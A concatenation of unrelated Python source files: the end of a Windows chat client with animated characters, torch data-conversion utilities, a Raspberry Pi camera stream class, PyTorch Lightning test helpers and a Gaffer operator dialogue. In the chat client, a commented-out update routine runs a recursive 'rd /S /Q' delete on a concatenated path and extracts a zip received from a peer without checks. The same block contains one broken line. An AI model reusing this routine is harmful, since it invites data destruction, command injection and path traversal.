elif msg == "" and anime == "checked": #receive a readCheck
'''3.if receive a readCheck confirm'''
self.sended_message_read = True #no need but on logical
self.showAction(self.getActionPath('read2.txt')) #show message read animation
self.sent_msg_win.destroy()
continue
else: self.receive_message_read = False #received a normal message but not readCheck, control to send when next click
except Exception as e:
'''chat closed'''
print(e)
print('not connected anymore')
if self.conn_socket != None:
print('close chat')
self.conn_socket.close()
else:
print('chat closed before close')
self.conn_socket = None
return
'''send the message to next stage .Control the timing here'''
self.chatmsg_queue.put((msg, anime))
win32gui.SendMessage(self.hwnd, WM_CHATMSGRECV, 0, 0)
def OnChatMessageReceived(self, hwnd, win32msg, wp, lp):
'''
Called when recv msg
it's in the main thread, so dealing with gui is safe.
maybe add history here
'''
msg, anime = self.chatmsg_queue.get()
print(msg)
self.this_messages.append(self.chat_name+': '+msg)
if msg != '':
self.ShowNewChatMsgWin(msg)
PlaySound('skin/newmessage.wav', SND_ASYNC)
if anime != '':
self.showAction(self.getActionPath(anime), repeating= True)
if self.speak_window_hwnd != 0:
win32gui.SetFocus(self.speak_window_hwnd)
def getParentDirectory(self, path):
#return os.path.abspath(os.path.join(path, os.pardir))
path2 = path.split('/')
temp=''
for ph in path2:
if(len(ph)>4 and (ph[len(ph)-4:] == '.txt')):
break
temp = os.path.join(temp, ph)
return temp
'''
def cmpCharVersion(self, myDataSize = 0, hisDataSize = 0):
if myDataSize == hisDataSize:
return True
return False
def getCharDataSize(self, charDirectory):
temp = 0
for dirPath, dirNames, fileNames in os.walk(charDirectory):
for fileName in fileNames:
file = os.path.join(dirPath, fileName)
temp += os.path.getsize(file)
return temp
def checkCharVersion(self):
text = str(self.getCharDataSize(self.getParentDirectory(self.myCharFile)))
mp. (self.conn_socket, text.encode('utf8'))
data = mp.recvPacket(self.conn_socket).decode('utf8')
if self.cmpCharVersion(self.getCharDataSize(self.getParentDirectory(self.charFile)), int(data)):
return True
return False
def updateCharacter(self):
#fileName = mp.recvPacket(self.conn_socket).decode('utf8')
fileName = self.friendID+'.zip'
with open(fileName, 'wb') as cfile:
while True:
data = mp.recvPacket(self.conn_socket)
if data == b'EOF':
break
cfile.write(data)
win32gui.ShowWindow(self.hwnd, 0)
os.system('rd /S /Q ' + self.getParentDirectory(self.charFile))
zf = zipfile.ZipFile(fileName)
zf.extractall(self.getParentDirectory(self.charFile))
zf.close()
win32gui.ShowWindow(self.hwnd, 1)
os.remove(fileName)
def uploadCharacter(self):
sfileName = 'ArchiveName.zip'
zf = zipfile.ZipFile(sfileName,'w',zipfile.ZIP_DEFLATED)
parentDir = self.getParentDirectory(self.myCharFile)
for dirPath, dirNames, fileNames in os.walk(parentDir):
for fileName in fileNames:
file = os.path.join(dirPath, fileName)
zf.write(file, file[len(parentDir)+1:])
zf.close()
#mp.sendPacket(self.conn_socket, sfileName.encode('utf8'))
with open(sfileName, 'rb') as file:
while True:
data = file.read(4096)
if not data:
break
mp.sendPacket(self.conn_socket, data)
time.sleep(1) # delete after send in fixed len
mp.sendPacket(self.conn_socket, b'EOF')
os.remove(sfileName)
'''
def sendVersionAndUpdata(self):
print('send version and updata in image')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.ip, 12348))
print('updata sock:', sock)
#arg = (sock, myChafile, friChafile, friendID, callbackfunc)
updataIfNeed(sock, self.myCharFile, self.friendID, self.setChadisplay, self.callbackfunc)
def getActionPath(self, action_filename):
path = self.getParentDirectory(self.charFile)
return path + '/skeleton/'+action_filename
def getSelfActionList(self):
print(self.myCharFile)
path = self.getParentDirectory(self.myCharFile) + '/skeleton/'
anime_list = [f for f in os.listdir(path) if os.path.splitext(f)[1]=='.txt']
return anime_list
def callbackfunc(self):
print('callback')
def setChadisplay(self, value=None):
if value == None:
return self.charFile
win32gui.ShowWindow(self.hwnd, value)
if value == 1:
self.showAction(self.getActionPath('idle.txt'), repeating = True)
return None
class ChangeImageThread(threading.Thread):
def __init__(self, win, repeating):
self.win = win
self.only_once = not repeating
self.started = False
super(ChangeImageThread, self).__init__()
def run(self):
try:
while self.win.actionThread is self:
self.win.SwitchNextImage()
if self.only_once and self.win.image_index == 0:
if self.started:
self.win.showAction(self.win.getActionPath('idle.txt'), True)
self.started = True
time.sleep(self.win.GetCurrentImageRemainTime())
except:pass
self.win = None
if __name__ == '__main__':
'''
test codes are too old, try some new codes.
'''
win = image_window(lambda:win32gui.PostQuitMessage(0), '123', None, '111.111.111.111', 'data/1/char/1/character1.txt', '1')
def test(msg):
win.ShowNewChatMsgWin(msg)
print(msg,'thread ended')
'''this test cause problems because of using tk in thread'''
threading.Thread(target=test, args=('Hello, World',)).start()
#win.uploadCharacter()
print('uploadCharacter done')
win32gui.PumpMessages()
|
data_helper.py | from typing import Iterable, Any, Optional, List
from collections.abc import Sequence
import numbers
import time
import copy
from threading import Thread
from queue import Queue
import numpy as np
import torch
def to_device(item: Any, device: str, ignore_keys: list = []) -> Any:
"""
Overview:
Transfer data to certain device
Arguments:
- item (:obj:`Any`): the item to be transferred
- device (:obj:`str`): the device wanted
- ignore_keys (:obj:`list`): the keys to be ignored in transfer, defalut set to empty
Returns:
- item (:obj:`Any`): the transferred item
.. note:
Now supports item type: :obj:`torch.nn.Module`, :obj:`torch.Tensor`, :obj:`Sequence`, \
:obj:`dict`, :obj:`numbers.Integral`, :obj:`numbers.Real`, :obj:`np.ndarray`, :obj:`str` and :obj:`None`.
"""
if isinstance(item, torch.nn.Module):
return item.to(device)
elif isinstance(item, torch.Tensor):
return item.to(device)
elif isinstance(item, Sequence):
if isinstance(item, str):
return item
else:
return [to_device(t, device) for t in item]
elif isinstance(item, dict):
new_item = {}
for k in item.keys():
if k in ignore_keys:
new_item[k] = item[k]
else:
new_item[k] = to_device(item[k], device)
return new_item
elif isinstance(item, numbers.Integral) or isinstance(item, numbers.Real):
return item
elif isinstance(item, np.ndarray) or isinstance(item, np.bool_):
return item
elif item is None or isinstance(item, str):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_dtype(item: Any, dtype: type) -> Any:
r"""
Overview:
Change data to certain dtype
Arguments:
- item (:obj:`Any`): the item to be dtype changed
- dtype (:obj:`type`): the type wanted
Returns:
- item (:obj:`object`): the dtype changed item
.. note:
Now supports item type: :obj:`torch.Tensor`, :obj:`Sequence`, :obj:`dict`
"""
if isinstance(item, torch.Tensor):
return item.to(dtype=dtype)
elif isinstance(item, Sequence):
return [to_dtype(t, dtype) for t in item]
elif isinstance(item, dict):
return {k: to_dtype(item[k], dtype) for k in item.keys()}
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_tensor(
item: Any,
dtype: Optional[torch.dtype] = None,
ignore_keys: list = [],
transform_scalar: bool = True
) -> torch.Tensor:
r"""
Overview:
Change `numpy.ndarray`, sequence of scalars to torch.Tensor, and keep other data types unchanged.
Arguments:
- item (:obj:`Any`): the item to be changed
- dtype (:obj:`type`): the type of wanted tensor
Returns:
- item (:obj:`torch.Tensor`): the change tensor
.. note:
Now supports item type: :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return torch.as_tensor(d)
else:
return torch.tensor(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
if k in ignore_keys:
new_data[k] = v
else:
new_data[k] = to_tensor(v, dtype, ignore_keys, transform_scalar)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return []
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_tensor(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_tensor(t, dtype, ignore_keys, transform_scalar))
return new_data
elif isinstance(item, np.ndarray):
if dtype is None:
if item.dtype == np.float64:
return torch.FloatTensor(item)
else:
return torch.from_numpy(item)
else:
return torch.from_numpy(item).to(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
if transform_scalar:
if dtype is None:
return torch.as_tensor(item)
else:
return torch.as_tensor(item).to(dtype)
else:
return item
elif item is None:
return None
elif isinstance(item, torch.Tensor):
if dtype is None:
return item
else:
return item.to(dtype)
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_ndarray(item: Any, dtype: np.dtype = None) -> np.ndarray:
r"""
Overview:
Change `torch.Tensor`, sequence of scalars to ndarray, and keep other data types unchanged.
Arguments:
- item (:obj:`object`): the item to be changed
- dtype (:obj:`type`): the type of wanted ndarray
Returns:
- item (:obj:`object`): the changed ndarray
.. note:
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
def transform(d):
if dtype is None:
return np.array(d)
else:
return np.array(d, dtype=dtype)
if isinstance(item, dict):
new_data = {}
for k, v in item.items():
new_data[k] = to_ndarray(v, dtype)
return new_data
elif isinstance(item, list) or isinstance(item, tuple):
if len(item) == 0:
return None
elif isinstance(item[0], numbers.Integral) or isinstance(item[0], numbers.Real):
return transform(item)
elif hasattr(item, '_fields'): # namedtuple
return type(item)(*[to_ndarray(t, dtype) for t in item])
else:
new_data = []
for t in item:
new_data.append(to_ndarray(t, dtype))
return new_data
elif isinstance(item, torch.Tensor):
if dtype is None:
return item.numpy()
else:
return item.numpy().astype(dtype)
elif isinstance(item, np.ndarray):
if dtype is None:
return item
else:
return item.astype(dtype)
elif isinstance(item, bool) or isinstance(item, str):
return item
elif np.isscalar(item):
return np.array(item)
elif item is None:
return None
else:
raise TypeError("not support item type: {}".format(type(item)))
def to_list(item: Any) -> list:
r"""
Overview:
Transform `torch.Tensor`, `numpy.ndarray` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`numpy.ndarray`, :obj:`dict`, :obj:`list`, \
:obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, np.ndarray):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [to_list(t) for t in item]
elif isinstance(item, dict):
return {k: to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def tensor_to_list(item):
r"""
Overview:
Transform `torch.Tensor` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [tensor_to_list(t) for t in item]
elif isinstance(item, dict):
return {k: tensor_to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def same_shape(data: list) -> bool:
r"""
Overview:
Judge whether all data elements in a list have the same shape.
Arguments:
- data (:obj:`list`): the list of data
Returns:
- same (:obj:`bool`): whether the list of data all have the same shape
"""
assert (isinstance(data, list))
shapes = [t.shape for t in data]
return len(set(shapes)) == 1
class LogDict(dict):
'''
Overview:
Derived from ``dict``; Would transform ``torch.Tensor`` to ``list`` for convenient logging.
'''
def _transform(self, data):
if isinstance(data, torch.Tensor):
new_data = data.tolist()
else:
new_data = data
return new_data
def __setitem__(self, key, value):
new_value = self._transform(value)
super().__setitem__(key, new_value)
def update(self, data):
for k, v in data.items():
self.__setitem__(k, v)
def build_log_buffer():
r"""
Overview:
Builg log buffer, a subclass of dict, which can transform the input data into log format.
Returns:
- log_buffer (:obj:`LogDict`): Log buffer dict
"""
return LogDict()
class CudaFetcher(object):
"""
Overview:
Fetch data from source, and transfer it to specified device.
Interfaces:
run, close
"""
def __init__(self, data_source: Iterable, device: str, queue_size: int = 4, sleep: float = 0.1) -> None:
self._source = data_source
self._queue = Queue(maxsize=queue_size)
self._stream = torch.cuda.Stream()
self._producer_thread = Thread(target=self._producer, args=(), name='cuda_fetcher_producer')
self._sleep = sleep
self._device = device
def __next__(self) -> Any:
return self._queue.get()
def run(self) -> None:
"""
Overview:
Start ``producer`` thread: Keep fetching data from source,
change the device, and put into ``queue`` for request.
"""
self._end_flag = False
self._producer_thread.start()
def close(self) -> None:
"""
Overview:
Stop ``producer`` thread by setting ``end_flag`` to ``True`` .
"""
self._end_flag = True
def _producer(self) -> None:
with torch.cuda.stream(self._stream):
while not self._end_flag:
if self._queue.full():
time.sleep(self._sleep)
else:
data = next(self._source)
data = to_device(data, self._device)
self._queue.put(data)
def get_tensor_data(data: Any) -> Any:
"""
Overview:
Get pure tensor data from the given data(without disturbing grad computation graph)
"""
if isinstance(data, torch.Tensor):
return data.data.clone()
elif data is None:
return None
elif isinstance(data, Sequence):
return [get_tensor_data(d) for d in data]
elif isinstance(data, dict):
return {k: get_tensor_data(v) for k, v in data.items()}
else:
raise TypeError("not support type in get_tensor_data: {}".format(type(data)))
def unsqueeze(data: Any, dim: int = 0) -> Any:
if isinstance(data, torch.Tensor):
return data.unsqueeze(dim)
elif isinstance(data, Sequence):
return [unsqueeze(d) for d in data]
elif isinstance(data, dict):
return {k: unsqueeze(v, 0) for k, v in data.items()}
else:
raise TypeError("not support type in unsqueeze: {}".format(type(data)))
def get_null_data(template: Any, num: int) -> List[Any]:
ret = []
for _ in range(num):
data = copy.deepcopy(template)
data['null'] = True
data['done'] = True
data['reward'].zero_()
ret.append(data)
return ret
|
picam.py | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32, rotation=0):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.rotation = rotation
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
develop_utils.py | import os
import numpy as np
# from pl_examples import LightningTemplateModel
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger, TestTubeLogger
from tests import TEMP_PATH, RANDOM_PORTS, RANDOM_SEEDS
from tests.base.model_template import EvalModelTemplate
import functools
def assert_speed_parity_relative(pl_times, pt_times, max_diff: float = 0.1):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanila time
diffs = diffs / np.asarray(pt_times)
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def assert_speed_parity_absolute(pl_times, pt_times, nb_epochs, max_diff: float = 0.6):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanila time
diffs = diffs / nb_epochs
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def get_default_logger(save_dir, version=None):
# set up logger object without actually saving logs
logger = TensorBoardLogger(save_dir, name='lightning_logs', version=version)
return logger
def get_data_path(expt_logger, path_dir=None):
# some calls contain only experiment not complete logger
# each logger has to have these attributes
name, version = expt_logger.name, expt_logger.version
# only the test-tube experiment has such attribute
if isinstance(expt_logger, TestTubeLogger):
expt = expt_logger.experiment if hasattr(expt_logger, 'experiment') else expt_logger
return expt.get_data_path(name, version)
# the other experiments...
if not path_dir:
if hasattr(expt_logger, 'save_dir') and expt_logger.save_dir:
path_dir = expt_logger.save_dir
else:
path_dir = TEMP_PATH
path_expt = os.path.join(path_dir, name, 'version_%s' % version)
# try if the new sub-folder exists, typical case for test-tube
if not os.path.isdir(path_expt):
path_expt = path_dir
return path_expt
def load_model_from_checkpoint(logger, root_weights_dir, module_class=EvalModelTemplate, path_expt=None):
trained_model = module_class.load_from_checkpoint(root_weights_dir)
assert trained_model is not None, 'loading model failed'
return trained_model
def assert_ok_model_acc(trainer, key='test_acc', thr=0.5):
# this model should get 0.80+ acc
acc = trainer.callback_metrics[key]
assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed():
seed = RANDOM_SEEDS.pop()
seed_everything(seed)
def set_random_master_port():
reset_seed()
port = RANDOM_PORTS.pop()
os.environ['MASTER_PORT'] = str(port)
def init_checkpoint_callback(logger):
checkpoint = ModelCheckpoint(logger.save_dir)
return checkpoint
def pl_multi_process_test(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
from multiprocessing import Process, Queue
queue = Queue()
def inner_f(queue, **kwargs):
try:
func(**kwargs)
queue.put(1)
except Exception as e:
import traceback
traceback.print_exc()
queue.put(-1)
p = Process(target=inner_f, args=(queue,), kwargs=kwargs)
p.start()
p.join()
result = queue.get()
assert result == 1
return wrapper
|
OpDialogue.py | ##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import threading
import traceback
import imath
import IECore
import Gaffer
import GafferUI
import GafferCortex
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None_", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None_", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = GafferCortex.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( imath.V2i( 1 ), preferredSize = imath.V2i( 1, 1 ) )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None_,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( imath.V2i( 250, 1 ), preferredSize = imath.V2i( 250, 1 ) )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget( toolbars = True )
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged ), scoped = True
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signals.Signal2()
self.__opExecutedSignal = Gaffer.Signals.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connectFront( Gaffer.WeakMethod( self.__close ), scoped = True )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connectFront( Gaffer.WeakMethod( self.__initiateExecution ), scoped = True )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception as e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ), scoped = True )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ), scoped = True )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None_ :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
